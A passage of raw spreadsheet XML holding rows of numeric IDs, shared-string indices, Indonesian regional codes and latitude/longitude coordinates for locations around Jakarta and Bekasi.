        <v>108343</v>
      </c>
      <c r="B773" s="1">
        <v>43883</v>
      </c>
      <c r="C773">
        <v>1</v>
      </c>
      <c r="D773" t="s">
        <v>22</v>
      </c>
      <c r="E773" t="s">
        <v>23</v>
      </c>
      <c r="F773" t="s">
        <v>3097</v>
      </c>
      <c r="H773" t="s">
        <v>26</v>
      </c>
      <c r="I773" t="s">
        <v>1710</v>
      </c>
      <c r="J773" t="s">
        <v>3098</v>
      </c>
      <c r="L773" t="s">
        <v>3099</v>
      </c>
      <c r="M773">
        <v>3172060001</v>
      </c>
      <c r="N773">
        <v>3172060</v>
      </c>
      <c r="O773">
        <v>3172</v>
      </c>
      <c r="P773">
        <v>31</v>
      </c>
      <c r="Q773" t="s">
        <v>309</v>
      </c>
      <c r="R773" t="s">
        <v>48</v>
      </c>
      <c r="S773" t="s">
        <v>49</v>
      </c>
      <c r="T773" t="s">
        <v>33</v>
      </c>
      <c r="U773" s="5">
        <v>10686637</v>
      </c>
      <c r="V773" s="5" t="s">
        <v>15168</v>
      </c>
      <c r="W773" s="5">
        <v>-622823</v>
      </c>
      <c r="X773" t="s">
        <v>18967</v>
      </c>
      <c r="Y773" t="str">
        <f t="shared" si="12"/>
        <v>-6.22823,106.86637</v>
      </c>
    </row>
    <row r="774" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A774">
        <v>108344</v>
      </c>
      <c r="B774" s="1">
        <v>43883</v>
      </c>
      <c r="C774">
        <v>1</v>
      </c>
      <c r="D774" t="s">
        <v>22</v>
      </c>
      <c r="E774" t="s">
        <v>23</v>
      </c>
      <c r="F774" t="s">
        <v>3100</v>
      </c>
      <c r="G774" t="s">
        <v>3101</v>
      </c>
      <c r="H774" t="s">
        <v>26</v>
      </c>
      <c r="I774" t="s">
        <v>628</v>
      </c>
      <c r="J774" t="s">
        <v>2331</v>
      </c>
      <c r="L774" t="s">
        <v>3102</v>
      </c>
      <c r="M774">
        <v>3173050003</v>
      </c>
      <c r="N774">
        <v>3173050</v>
      </c>
      <c r="O774">
        <v>3173</v>
      </c>
      <c r="P774">
        <v>31</v>
      </c>
      <c r="Q774" t="s">
        <v>2333</v>
      </c>
      <c r="R774" t="s">
        <v>589</v>
      </c>
      <c r="S774" t="s">
        <v>62</v>
      </c>
      <c r="T774" t="s">
        <v>33</v>
      </c>
      <c r="U774" s="5">
        <v>10686467</v>
      </c>
      <c r="V774" s="5" t="s">
        <v>15169</v>
      </c>
      <c r="W774" s="5">
        <v>-617847</v>
      </c>
      <c r="X774" t="s">
        <v>18968</v>
      </c>
      <c r="Y774" t="str">
        <f t="shared" si="12"/>
        <v>-6.17847,106.86467</v>
      </c>
    </row>
    <row r="775" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A775">
        <v>108345</v>
      </c>
      <c r="B775" s="1">
        <v>43883</v>
      </c>
      <c r="C775">
        <v>1</v>
      </c>
      <c r="D775" t="s">
        <v>22</v>
      </c>
      <c r="E775" t="s">
        <v>23</v>
      </c>
      <c r="F775" t="s">
        <v>3103</v>
      </c>
      <c r="G775" t="s">
        <v>3104</v>
      </c>
      <c r="H775" t="s">
        <v>26</v>
      </c>
      <c r="I775" t="s">
        <v>193</v>
      </c>
      <c r="J775" t="s">
        <v>3105</v>
      </c>
      <c r="L775" t="s">
        <v>3106</v>
      </c>
      <c r="M775">
        <v>3172100005</v>
      </c>
      <c r="N775">
        <v>3172100</v>
      </c>
      <c r="O775">
        <v>3172</v>
      </c>
      <c r="P775">
        <v>31</v>
      </c>
      <c r="Q775" t="s">
        <v>1773</v>
      </c>
      <c r="R775" t="s">
        <v>1436</v>
      </c>
      <c r="S775" t="s">
        <v>49</v>
      </c>
      <c r="T775" t="s">
        <v>33</v>
      </c>
      <c r="U775" s="5">
        <v>10686645</v>
      </c>
      <c r="V775" s="5" t="s">
        <v>15170</v>
      </c>
      <c r="W775" s="5">
        <v>-620003</v>
      </c>
      <c r="X775" t="s">
        <v>18969</v>
      </c>
      <c r="Y775" t="str">
        <f t="shared" si="12"/>
        <v>-6.20003,106.86645</v>
      </c>
    </row>
    <row r="776" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A776">
        <v>108346</v>
      </c>
      <c r="B776" s="1">
        <v>43883</v>
      </c>
      <c r="C776">
        <v>1</v>
      </c>
      <c r="D776" t="s">
        <v>22</v>
      </c>
      <c r="E776" t="s">
        <v>23</v>
      </c>
      <c r="F776" t="s">
        <v>3107</v>
      </c>
      <c r="G776" t="s">
        <v>3108</v>
      </c>
      <c r="H776" t="s">
        <v>26</v>
      </c>
      <c r="I776" t="s">
        <v>805</v>
      </c>
      <c r="J776" t="s">
        <v>1022</v>
      </c>
      <c r="L776" t="s">
        <v>3109</v>
      </c>
      <c r="M776">
        <v>3172060002</v>
      </c>
      <c r="N776">
        <v>3172060</v>
      </c>
      <c r="O776">
        <v>3172</v>
      </c>
      <c r="P776">
        <v>31</v>
      </c>
      <c r="Q776" t="s">
        <v>1025</v>
      </c>
      <c r="R776" t="s">
        <v>48</v>
      </c>
      <c r="S776" t="s">
        <v>49</v>
      </c>
      <c r="T776" t="s">
        <v>33</v>
      </c>
      <c r="U776" s="5">
        <v>10687598</v>
      </c>
      <c r="V776" s="5" t="s">
        <v>15171</v>
      </c>
      <c r="W776" s="5">
        <v>-624440</v>
      </c>
      <c r="X776" t="s">
        <v>18970</v>
      </c>
      <c r="Y776" t="str">
        <f t="shared" si="12"/>
        <v>-6.24440,106.87598</v>
      </c>
    </row>
    <row r="777" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A777">
        <v>108347</v>
      </c>
      <c r="B777" s="1">
        <v>43883</v>
      </c>
      <c r="C777">
        <v>1</v>
      </c>
      <c r="D777" t="s">
        <v>22</v>
      </c>
      <c r="E777" t="s">
        <v>23</v>
      </c>
      <c r="F777" t="s">
        <v>3110</v>
      </c>
      <c r="G777" t="s">
        <v>3111</v>
      </c>
      <c r="H777" t="s">
        <v>26</v>
      </c>
      <c r="I777" t="s">
        <v>908</v>
      </c>
      <c r="J777" t="s">
        <v>3112</v>
      </c>
      <c r="L777" t="s">
        <v>3113</v>
      </c>
      <c r="M777">
        <v>3172090002</v>
      </c>
      <c r="N777">
        <v>3172090</v>
      </c>
      <c r="O777">
        <v>3172</v>
      </c>
      <c r="P777">
        <v>31</v>
      </c>
      <c r="Q777" t="s">
        <v>2931</v>
      </c>
      <c r="R777" t="s">
        <v>890</v>
      </c>
      <c r="S777" t="s">
        <v>49</v>
      </c>
      <c r="T777" t="s">
        <v>33</v>
      </c>
      <c r="U777" s="5">
        <v>10688629</v>
      </c>
      <c r="V777" s="5" t="s">
        <v>15172</v>
      </c>
      <c r="W777" s="5">
        <v>-621027</v>
      </c>
      <c r="X777" t="s">
        <v>18971</v>
      </c>
      <c r="Y777" t="str">
        <f t="shared" si="12"/>
        <v>-6.21027,106.88629</v>
      </c>
    </row>
    <row r="778" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A778">
        <v>108348</v>
      </c>
      <c r="B778" s="1">
        <v>43883</v>
      </c>
      <c r="C778">
        <v>1</v>
      </c>
      <c r="D778" t="s">
        <v>22</v>
      </c>
      <c r="E778" t="s">
        <v>23</v>
      </c>
      <c r="F778" t="s">
        <v>3114</v>
      </c>
      <c r="G778" t="s">
        <v>3115</v>
      </c>
      <c r="H778" t="s">
        <v>26</v>
      </c>
      <c r="I778" t="s">
        <v>3116</v>
      </c>
      <c r="J778" t="s">
        <v>3117</v>
      </c>
      <c r="M778">
        <v>3172060005</v>
      </c>
      <c r="N778">
        <v>3172060</v>
      </c>
      <c r="O778">
        <v>3172</v>
      </c>
      <c r="P778">
        <v>31</v>
      </c>
      <c r="Q778" t="s">
        <v>1019</v>
      </c>
      <c r="R778" t="s">
        <v>48</v>
      </c>
      <c r="S778" t="s">
        <v>49</v>
      </c>
      <c r="T778" t="s">
        <v>33</v>
      </c>
      <c r="U778" s="5">
        <v>10687495</v>
      </c>
      <c r="V778" s="5" t="s">
        <v>15173</v>
      </c>
      <c r="W778" s="5">
        <v>-621944</v>
      </c>
      <c r="X778" t="s">
        <v>18972</v>
      </c>
      <c r="Y778" t="str">
        <f t="shared" si="12"/>
        <v>-6.21944,106.87495</v>
      </c>
    </row>
    <row r="779" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A779">
        <v>108349</v>
      </c>
      <c r="B779" s="1">
        <v>43883</v>
      </c>
      <c r="C779">
        <v>1</v>
      </c>
      <c r="D779" t="s">
        <v>22</v>
      </c>
      <c r="E779" t="s">
        <v>23</v>
      </c>
      <c r="F779" t="s">
        <v>3118</v>
      </c>
      <c r="G779" t="s">
        <v>3119</v>
      </c>
      <c r="H779" t="s">
        <v>26</v>
      </c>
      <c r="I779" t="s">
        <v>1194</v>
      </c>
      <c r="J779" t="s">
        <v>3120</v>
      </c>
      <c r="M779">
        <v>3172060005</v>
      </c>
      <c r="N779">
        <v>3172060</v>
      </c>
      <c r="O779">
        <v>3172</v>
      </c>
      <c r="P779">
        <v>31</v>
      </c>
      <c r="Q779" t="s">
        <v>1019</v>
      </c>
      <c r="R779" t="s">
        <v>48</v>
      </c>
      <c r="S779" t="s">
        <v>49</v>
      </c>
      <c r="T779" t="s">
        <v>33</v>
      </c>
      <c r="U779" s="5">
        <v>10688514</v>
      </c>
      <c r="V779" s="5" t="s">
        <v>15174</v>
      </c>
      <c r="W779" s="5">
        <v>-621868</v>
      </c>
      <c r="X779" t="s">
        <v>18973</v>
      </c>
      <c r="Y779" t="str">
        <f t="shared" si="12"/>
        <v>-6.21868,106.88514</v>
      </c>
    </row>
    <row r="780" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A780">
        <v>108350</v>
      </c>
      <c r="B780" s="1">
        <v>43883</v>
      </c>
      <c r="C780">
        <v>1</v>
      </c>
      <c r="D780" t="s">
        <v>22</v>
      </c>
      <c r="E780" t="s">
        <v>23</v>
      </c>
      <c r="F780" t="s">
        <v>3121</v>
      </c>
      <c r="G780" t="s">
        <v>3122</v>
      </c>
      <c r="H780" t="s">
        <v>26</v>
      </c>
      <c r="I780" t="s">
        <v>3042</v>
      </c>
      <c r="J780" t="s">
        <v>3072</v>
      </c>
      <c r="L780" t="s">
        <v>3123</v>
      </c>
      <c r="M780">
        <v>3172080003</v>
      </c>
      <c r="N780">
        <v>3172080</v>
      </c>
      <c r="O780">
        <v>3172</v>
      </c>
      <c r="P780">
        <v>31</v>
      </c>
      <c r="Q780" t="s">
        <v>2250</v>
      </c>
      <c r="R780" t="s">
        <v>141</v>
      </c>
      <c r="S780" t="s">
        <v>49</v>
      </c>
      <c r="T780" t="s">
        <v>33</v>
      </c>
      <c r="U780" s="5">
        <v>10694763</v>
      </c>
      <c r="V780" s="5" t="s">
        <v>15175</v>
      </c>
      <c r="W780" s="5">
        <v>-619834</v>
      </c>
      <c r="X780" t="s">
        <v>18974</v>
      </c>
      <c r="Y780" t="str">
        <f t="shared" si="12"/>
        <v>-6.19834,106.94763</v>
      </c>
    </row>
    <row r="781" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A781">
        <v>108351</v>
      </c>
      <c r="B781" s="1">
        <v>43883</v>
      </c>
      <c r="C781">
        <v>1</v>
      </c>
      <c r="D781" t="s">
        <v>22</v>
      </c>
      <c r="E781" t="s">
        <v>23</v>
      </c>
      <c r="F781" t="s">
        <v>3124</v>
      </c>
      <c r="G781" t="s">
        <v>3125</v>
      </c>
      <c r="H781" t="s">
        <v>26</v>
      </c>
      <c r="I781" t="s">
        <v>72</v>
      </c>
      <c r="J781" t="s">
        <v>3126</v>
      </c>
      <c r="L781" t="s">
        <v>250</v>
      </c>
      <c r="M781">
        <v>3173030002</v>
      </c>
      <c r="N781">
        <v>3173030</v>
      </c>
      <c r="O781">
        <v>3173</v>
      </c>
      <c r="P781">
        <v>31</v>
      </c>
      <c r="Q781" t="s">
        <v>3127</v>
      </c>
      <c r="R781" t="s">
        <v>3128</v>
      </c>
      <c r="S781" t="s">
        <v>62</v>
      </c>
      <c r="T781" t="s">
        <v>33</v>
      </c>
      <c r="U781" s="5">
        <v>10685141</v>
      </c>
      <c r="V781" s="5" t="s">
        <v>15176</v>
      </c>
      <c r="W781" s="5">
        <v>-619236</v>
      </c>
      <c r="X781" t="s">
        <v>18975</v>
      </c>
      <c r="Y781" t="str">
        <f t="shared" si="12"/>
        <v>-6.19236,106.85141</v>
      </c>
    </row>
    <row r="782" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A782">
        <v>108352</v>
      </c>
      <c r="B782" s="1">
        <v>43883</v>
      </c>
      <c r="C782">
        <v>1</v>
      </c>
      <c r="D782" t="s">
        <v>22</v>
      </c>
      <c r="E782" t="s">
        <v>23</v>
      </c>
      <c r="F782" t="s">
        <v>3129</v>
      </c>
      <c r="G782" t="s">
        <v>3130</v>
      </c>
      <c r="H782" t="s">
        <v>26</v>
      </c>
      <c r="I782" t="s">
        <v>271</v>
      </c>
      <c r="J782" t="s">
        <v>2627</v>
      </c>
      <c r="L782" t="s">
        <v>3131</v>
      </c>
      <c r="M782">
        <v>3216090001</v>
      </c>
      <c r="N782">
        <v>3216090</v>
      </c>
      <c r="O782">
        <v>3216</v>
      </c>
      <c r="P782">
        <v>32</v>
      </c>
      <c r="Q782" t="s">
        <v>334</v>
      </c>
      <c r="R782" t="s">
        <v>335</v>
      </c>
      <c r="S782" t="s">
        <v>41</v>
      </c>
      <c r="T782" t="s">
        <v>42</v>
      </c>
      <c r="U782" s="5">
        <v>10702389</v>
      </c>
      <c r="V782" s="5" t="s">
        <v>15177</v>
      </c>
      <c r="W782" s="5">
        <v>-617442</v>
      </c>
      <c r="X782" t="s">
        <v>18976</v>
      </c>
      <c r="Y782" t="str">
        <f t="shared" si="12"/>
        <v>-6.17442,107.02389</v>
      </c>
    </row>
    <row r="783" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A783">
        <v>108353</v>
      </c>
      <c r="B783" s="1">
        <v>43883</v>
      </c>
      <c r="C783">
        <v>1</v>
      </c>
      <c r="D783" t="s">
        <v>22</v>
      </c>
      <c r="E783" t="s">
        <v>23</v>
      </c>
      <c r="F783" t="s">
        <v>3132</v>
      </c>
      <c r="G783" t="s">
        <v>3133</v>
      </c>
      <c r="H783" t="s">
        <v>26</v>
      </c>
      <c r="I783" t="s">
        <v>3134</v>
      </c>
      <c r="J783" t="s">
        <v>3135</v>
      </c>
      <c r="M783">
        <v>3671041001</v>
      </c>
      <c r="N783">
        <v>3671041</v>
      </c>
      <c r="O783">
        <v>3671</v>
      </c>
      <c r="P783">
        <v>36</v>
      </c>
      <c r="Q783" t="s">
        <v>3136</v>
      </c>
      <c r="R783" t="s">
        <v>3137</v>
      </c>
      <c r="S783" t="s">
        <v>201</v>
      </c>
      <c r="T783" t="s">
        <v>171</v>
      </c>
      <c r="U783" s="5">
        <v>10662237</v>
      </c>
      <c r="V783" s="5" t="s">
        <v>15178</v>
      </c>
      <c r="W783" s="5">
        <v>-621947</v>
      </c>
      <c r="X783" t="s">
        <v>18977</v>
      </c>
      <c r="Y783" t="str">
        <f t="shared" si="12"/>
        <v>-6.21947,106.62237</v>
      </c>
    </row>
    <row r="784" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A784">
        <v>108354</v>
      </c>
      <c r="B784" s="1">
        <v>43883</v>
      </c>
      <c r="C784">
        <v>1</v>
      </c>
      <c r="D784" t="s">
        <v>22</v>
      </c>
      <c r="E784" t="s">
        <v>23</v>
      </c>
      <c r="F784" t="s">
        <v>3138</v>
      </c>
      <c r="G784" t="s">
        <v>3139</v>
      </c>
      <c r="H784" t="s">
        <v>26</v>
      </c>
      <c r="I784" t="s">
        <v>1542</v>
      </c>
      <c r="J784" t="s">
        <v>3140</v>
      </c>
      <c r="L784" t="s">
        <v>3141</v>
      </c>
      <c r="M784">
        <v>3172060005</v>
      </c>
      <c r="N784">
        <v>3172060</v>
      </c>
      <c r="O784">
        <v>3172</v>
      </c>
      <c r="P784">
        <v>31</v>
      </c>
      <c r="Q784" t="s">
        <v>1019</v>
      </c>
      <c r="R784" t="s">
        <v>48</v>
      </c>
      <c r="S784" t="s">
        <v>49</v>
      </c>
      <c r="T784" t="s">
        <v>33</v>
      </c>
      <c r="U784" s="5">
        <v>10687581</v>
      </c>
      <c r="V784" s="5" t="s">
        <v>15179</v>
      </c>
      <c r="W784" s="5">
        <v>-622491</v>
      </c>
      <c r="X784" t="s">
        <v>18978</v>
      </c>
      <c r="Y784" t="str">
        <f t="shared" si="12"/>
        <v>-6.22491,106.87581</v>
      </c>
    </row>
    <row r="785" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A785">
        <v>108355</v>
      </c>
      <c r="B785" s="1">
        <v>43883</v>
      </c>
      <c r="C785">
        <v>1</v>
      </c>
      <c r="D785" t="s">
        <v>22</v>
      </c>
      <c r="E785" t="s">
        <v>23</v>
      </c>
      <c r="F785" t="s">
        <v>3142</v>
      </c>
      <c r="G785" t="s">
        <v>3143</v>
      </c>
      <c r="H785" t="s">
        <v>26</v>
      </c>
      <c r="I785" t="s">
        <v>2165</v>
      </c>
      <c r="J785" t="s">
        <v>2627</v>
      </c>
      <c r="L785" t="s">
        <v>3144</v>
      </c>
      <c r="M785">
        <v>3216090001</v>
      </c>
      <c r="N785">
        <v>3216090</v>
      </c>
      <c r="O785">
        <v>3216</v>
      </c>
      <c r="P785">
        <v>32</v>
      </c>
      <c r="Q785" t="s">
        <v>334</v>
      </c>
      <c r="R785" t="s">
        <v>335</v>
      </c>
      <c r="S785" t="s">
        <v>41</v>
      </c>
      <c r="T785" t="s">
        <v>42</v>
      </c>
      <c r="U785" s="5">
        <v>10700840</v>
      </c>
      <c r="V785" s="5" t="s">
        <v>15180</v>
      </c>
      <c r="W785" s="5">
        <v>-617832</v>
      </c>
      <c r="X785" t="s">
        <v>18979</v>
      </c>
      <c r="Y785" t="str">
        <f t="shared" si="12"/>
        <v>-6.17832,107.00840</v>
      </c>
    </row>
    <row r="786" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A786">
        <v>108356</v>
      </c>
      <c r="B786" s="1">
        <v>43883</v>
      </c>
      <c r="C786">
        <v>1</v>
      </c>
      <c r="D786" t="s">
        <v>22</v>
      </c>
      <c r="E786" t="s">
        <v>23</v>
      </c>
      <c r="F786" t="s">
        <v>3145</v>
      </c>
      <c r="G786" t="s">
        <v>3146</v>
      </c>
      <c r="H786" t="s">
        <v>26</v>
      </c>
      <c r="I786" t="s">
        <v>27</v>
      </c>
      <c r="J786" t="s">
        <v>2627</v>
      </c>
      <c r="M786">
        <v>3275061004</v>
      </c>
      <c r="N786">
        <v>3275061</v>
      </c>
      <c r="O786">
        <v>3275</v>
      </c>
      <c r="P786">
        <v>32</v>
      </c>
      <c r="Q786" t="s">
        <v>39</v>
      </c>
      <c r="R786" t="s">
        <v>40</v>
      </c>
      <c r="S786" t="s">
        <v>41</v>
      </c>
      <c r="T786" t="s">
        <v>42</v>
      </c>
      <c r="U786" s="5">
        <v>10697890</v>
      </c>
      <c r="V786" s="5" t="s">
        <v>15181</v>
      </c>
      <c r="W786" s="5">
        <v>-618565</v>
      </c>
      <c r="X786" t="s">
        <v>18980</v>
      </c>
      <c r="Y786" t="str">
        <f t="shared" si="12"/>
        <v>-6.18565,106.97890</v>
      </c>
    </row>
    <row r="787" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A787">
        <v>108357</v>
      </c>
      <c r="B787" s="1">
        <v>43883</v>
      </c>
      <c r="C787">
        <v>1</v>
      </c>
      <c r="D787" t="s">
        <v>22</v>
      </c>
      <c r="E787" t="s">
        <v>23</v>
      </c>
      <c r="F787" t="s">
        <v>3147</v>
      </c>
      <c r="G787" t="s">
        <v>3148</v>
      </c>
      <c r="H787" t="s">
        <v>26</v>
      </c>
      <c r="I787" t="s">
        <v>166</v>
      </c>
      <c r="J787" t="s">
        <v>3149</v>
      </c>
      <c r="L787" t="s">
        <v>3150</v>
      </c>
      <c r="M787">
        <v>3173040001</v>
      </c>
      <c r="N787">
        <v>3173040</v>
      </c>
      <c r="O787">
        <v>3173</v>
      </c>
      <c r="P787">
        <v>31</v>
      </c>
      <c r="Q787" t="s">
        <v>1598</v>
      </c>
      <c r="R787" t="s">
        <v>1598</v>
      </c>
      <c r="S787" t="s">
        <v>62</v>
      </c>
      <c r="T787" t="s">
        <v>33</v>
      </c>
      <c r="U787" s="5">
        <v>10685416</v>
      </c>
      <c r="V787" s="5" t="s">
        <v>15182</v>
      </c>
      <c r="W787" s="5">
        <v>-618679</v>
      </c>
      <c r="X787" t="s">
        <v>18981</v>
      </c>
      <c r="Y787" t="str">
        <f t="shared" si="12"/>
        <v>-6.18679,106.85416</v>
      </c>
    </row>
    <row r="788" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A788">
        <v>108358</v>
      </c>
      <c r="B788" s="1">
        <v>43883</v>
      </c>
      <c r="C788">
        <v>1</v>
      </c>
      <c r="D788" t="s">
        <v>22</v>
      </c>
      <c r="E788" t="s">
        <v>23</v>
      </c>
      <c r="F788" t="s">
        <v>3151</v>
      </c>
      <c r="H788" t="s">
        <v>26</v>
      </c>
      <c r="I788" t="s">
        <v>72</v>
      </c>
      <c r="J788" t="s">
        <v>3152</v>
      </c>
      <c r="L788" t="s">
        <v>3153</v>
      </c>
      <c r="M788">
        <v>3171090003</v>
      </c>
      <c r="N788">
        <v>3171090</v>
      </c>
      <c r="O788">
        <v>3171</v>
      </c>
      <c r="P788">
        <v>31</v>
      </c>
      <c r="Q788" t="s">
        <v>3154</v>
      </c>
      <c r="R788" t="s">
        <v>347</v>
      </c>
      <c r="S788" t="s">
        <v>108</v>
      </c>
      <c r="T788" t="s">
        <v>33</v>
      </c>
      <c r="U788" s="5">
        <v>10685779</v>
      </c>
      <c r="V788" s="5" t="s">
        <v>15183</v>
      </c>
      <c r="W788" s="5">
        <v>-623370</v>
      </c>
      <c r="X788" t="s">
        <v>18982</v>
      </c>
      <c r="Y788" t="str">
        <f t="shared" si="12"/>
        <v>-6.23370,106.85779</v>
      </c>
    </row>
    <row r="789" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A789">
        <v>108359</v>
      </c>
      <c r="B789" s="1">
        <v>43883</v>
      </c>
      <c r="C789">
        <v>1</v>
      </c>
      <c r="D789" t="s">
        <v>22</v>
      </c>
      <c r="E789" t="s">
        <v>23</v>
      </c>
      <c r="F789" t="s">
        <v>3155</v>
      </c>
      <c r="G789" t="s">
        <v>3156</v>
      </c>
      <c r="H789" t="s">
        <v>26</v>
      </c>
      <c r="I789" t="s">
        <v>2962</v>
      </c>
      <c r="J789" t="s">
        <v>3157</v>
      </c>
      <c r="L789" t="s">
        <v>3158</v>
      </c>
      <c r="M789">
        <v>3172070001</v>
      </c>
      <c r="N789">
        <v>3172070</v>
      </c>
      <c r="O789">
        <v>3172</v>
      </c>
      <c r="P789">
        <v>31</v>
      </c>
      <c r="Q789" t="s">
        <v>127</v>
      </c>
      <c r="R789" t="s">
        <v>128</v>
      </c>
      <c r="S789" t="s">
        <v>49</v>
      </c>
      <c r="T789" t="s">
        <v>33</v>
      </c>
      <c r="U789" s="5">
        <v>10689322</v>
      </c>
      <c r="V789" s="5" t="s">
        <v>15184</v>
      </c>
      <c r="W789" s="5">
        <v>-623377</v>
      </c>
      <c r="X789" t="s">
        <v>18983</v>
      </c>
      <c r="Y789" t="str">
        <f t="shared" si="12"/>
        <v>-6.23377,106.89322</v>
      </c>
    </row>
    <row r="790" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A790">
        <v>108360</v>
      </c>
      <c r="B790" s="1">
        <v>43883</v>
      </c>
      <c r="C790">
        <v>1</v>
      </c>
      <c r="D790" t="s">
        <v>22</v>
      </c>
      <c r="E790" t="s">
        <v>23</v>
      </c>
      <c r="F790" t="s">
        <v>3159</v>
      </c>
      <c r="G790" t="s">
        <v>3160</v>
      </c>
      <c r="H790" t="s">
        <v>26</v>
      </c>
      <c r="I790" t="s">
        <v>166</v>
      </c>
      <c r="J790" t="s">
        <v>3161</v>
      </c>
      <c r="M790">
        <v>3172090001</v>
      </c>
      <c r="N790">
        <v>3172090</v>
      </c>
      <c r="O790">
        <v>3172</v>
      </c>
      <c r="P790">
        <v>31</v>
      </c>
      <c r="Q790" t="s">
        <v>2681</v>
      </c>
      <c r="R790" t="s">
        <v>890</v>
      </c>
      <c r="S790" t="s">
        <v>49</v>
      </c>
      <c r="T790" t="s">
        <v>33</v>
      </c>
      <c r="U790" s="5">
        <v>10687997</v>
      </c>
      <c r="V790" s="5" t="s">
        <v>15185</v>
      </c>
      <c r="W790" s="5">
        <v>-620666</v>
      </c>
      <c r="X790" t="s">
        <v>18984</v>
      </c>
      <c r="Y790" t="str">
        <f t="shared" si="12"/>
        <v>-6.20666,106.87997</v>
      </c>
    </row>
    <row r="791" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A791">
        <v>108361</v>
      </c>
      <c r="B791" s="1">
        <v>43883</v>
      </c>
      <c r="C791">
        <v>1</v>
      </c>
      <c r="D791" t="s">
        <v>22</v>
      </c>
      <c r="E791" t="s">
        <v>23</v>
      </c>
      <c r="F791" t="s">
        <v>3162</v>
      </c>
      <c r="H791" t="s">
        <v>26</v>
      </c>
      <c r="I791" t="s">
        <v>3116</v>
      </c>
      <c r="J791" t="s">
        <v>2627</v>
      </c>
      <c r="L791" t="s">
        <v>3163</v>
      </c>
      <c r="M791">
        <v>3275061004</v>
      </c>
      <c r="N791">
        <v>3275061</v>
      </c>
      <c r="O791">
        <v>3275</v>
      </c>
      <c r="P791">
        <v>32</v>
      </c>
      <c r="Q791" t="s">
        <v>39</v>
      </c>
      <c r="R791" t="s">
        <v>40</v>
      </c>
      <c r="S791" t="s">
        <v>41</v>
      </c>
      <c r="T791" t="s">
        <v>42</v>
      </c>
      <c r="U791" s="5">
        <v>10699320</v>
      </c>
      <c r="V791" s="5" t="s">
        <v>15186</v>
      </c>
      <c r="W791" s="5">
        <v>-617989</v>
      </c>
      <c r="X791" t="s">
        <v>18985</v>
      </c>
      <c r="Y791" t="str">
        <f t="shared" si="12"/>
        <v>-6.17989,106.99320</v>
      </c>
    </row>
    <row r="792" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A792">
        <v>108362</v>
      </c>
      <c r="B792" s="1">
        <v>43883</v>
      </c>
      <c r="C792">
        <v>1</v>
      </c>
      <c r="D792" t="s">
        <v>22</v>
      </c>
      <c r="E792" t="s">
        <v>23</v>
      </c>
      <c r="F792" t="s">
        <v>3164</v>
      </c>
      <c r="G792" t="s">
        <v>3165</v>
      </c>
      <c r="H792" t="s">
        <v>26</v>
      </c>
      <c r="I792" t="s">
        <v>517</v>
      </c>
      <c r="J792" t="s">
        <v>3166</v>
      </c>
      <c r="L792" t="s">
        <v>3167</v>
      </c>
      <c r="M792">
        <v>3172100002</v>
      </c>
      <c r="N792">
        <v>3172100</v>
      </c>
      <c r="O792">
        <v>3172</v>
      </c>
      <c r="P792">
        <v>31</v>
      </c>
      <c r="Q792" t="s">
        <v>3168</v>
      </c>
      <c r="R792" t="s">
        <v>1436</v>
      </c>
      <c r="S792" t="s">
        <v>49</v>
      </c>
      <c r="T792" t="s">
        <v>33</v>
      </c>
      <c r="U792" s="5">
        <v>10685647</v>
      </c>
      <c r="V792" s="5" t="s">
        <v>15187</v>
      </c>
      <c r="W792" s="5">
        <v>-619897</v>
      </c>
      <c r="X792" t="s">
        <v>18986</v>
      </c>
      <c r="Y792" t="str">
        <f t="shared" si="12"/>
        <v>-6.19897,106.85647</v>
      </c>
    </row>
    <row r="793" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A793">
        <v>108363</v>
      </c>
      <c r="B793" s="1">
        <v>43883</v>
      </c>
      <c r="C793">
        <v>1</v>
      </c>
      <c r="D793" t="s">
        <v>22</v>
      </c>
      <c r="E793" t="s">
        <v>23</v>
      </c>
      <c r="F793" t="s">
        <v>3169</v>
      </c>
      <c r="G793" t="s">
        <v>3170</v>
      </c>
      <c r="H793" t="s">
        <v>26</v>
      </c>
      <c r="I793" t="s">
        <v>517</v>
      </c>
      <c r="J793" t="s">
        <v>3171</v>
      </c>
      <c r="L793" t="s">
        <v>3172</v>
      </c>
      <c r="M793">
        <v>3173050001</v>
      </c>
      <c r="N793">
        <v>3173050</v>
      </c>
      <c r="O793">
        <v>3173</v>
      </c>
      <c r="P793">
        <v>31</v>
      </c>
      <c r="Q793" t="s">
        <v>2790</v>
      </c>
      <c r="R793" t="s">
        <v>589</v>
      </c>
      <c r="S793" t="s">
        <v>62</v>
      </c>
      <c r="T793" t="s">
        <v>33</v>
      </c>
      <c r="U793" s="5">
        <v>10685967</v>
      </c>
      <c r="V793" s="5" t="s">
        <v>15188</v>
      </c>
      <c r="W793" s="5">
        <v>-619173</v>
      </c>
      <c r="X793" t="s">
        <v>18987</v>
      </c>
      <c r="Y793" t="str">
        <f t="shared" si="12"/>
        <v>-6.19173,106.85967</v>
      </c>
    </row>
    <row r="794" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A794">
        <v>108364</v>
      </c>
      <c r="B794" s="1">
        <v>43883</v>
      </c>
      <c r="C794">
        <v>1</v>
      </c>
      <c r="D794" t="s">
        <v>22</v>
      </c>
      <c r="E794" t="s">
        <v>23</v>
      </c>
      <c r="F794" t="s">
        <v>3173</v>
      </c>
      <c r="G794" t="s">
        <v>3174</v>
      </c>
      <c r="H794" t="s">
        <v>26</v>
      </c>
      <c r="I794" t="s">
        <v>271</v>
      </c>
      <c r="J794" t="s">
        <v>2627</v>
      </c>
      <c r="L794" t="s">
        <v>3175</v>
      </c>
      <c r="M794">
        <v>3216090001</v>
      </c>
      <c r="N794">
        <v>3216090</v>
      </c>
      <c r="O794">
